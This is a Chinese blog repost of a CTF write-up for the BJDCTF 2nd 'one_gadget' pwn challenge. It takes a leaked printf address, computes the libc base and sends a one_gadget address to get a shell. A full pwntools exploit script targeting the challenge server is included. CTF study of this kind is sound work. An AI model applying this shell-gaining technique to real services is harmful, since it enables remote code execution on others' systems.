其他分享
首页 > 其他分享> > CTF-Pwn-[BJDCTF 2nd]one_gadget的wp

CTF-Pwn-[BJDCTF 2nd]one_gadget的wp

作者:互联网

64位,放进ida看看
在这里插入图片描述
看一看这个main方法,要我们输入一个gadget,然后它回打印出来,再来看看init方法
在这里插入图片描述
用onegadget看看libc

one_gadget libc-2.29.so

发现
在这里插入图片描述
写脚本

from pwn import *

r=remote("node3.buuoj.cn",27772)
elf=ELF("./one_gadget")
libc=ELF('libc-2.29.so')

one_gadget1=[0xe237f,0xe2383,0xe2386,0x106ef8]
addr=int(r.recvline()[23:-1],16)

libc_base=addr-libc.sym['printf']
one_gadget=libc_base+one_gadget1[3]

r.recvuntil("Give me your one gadget:")
r.sendline(str(one_gadget))
r.interactive()

标签:addr,libc,gadget,ELF,2nd,gadget1,base,BJDCTF
来源: https://blog.csdn.net/wuyvle/article/details/113728408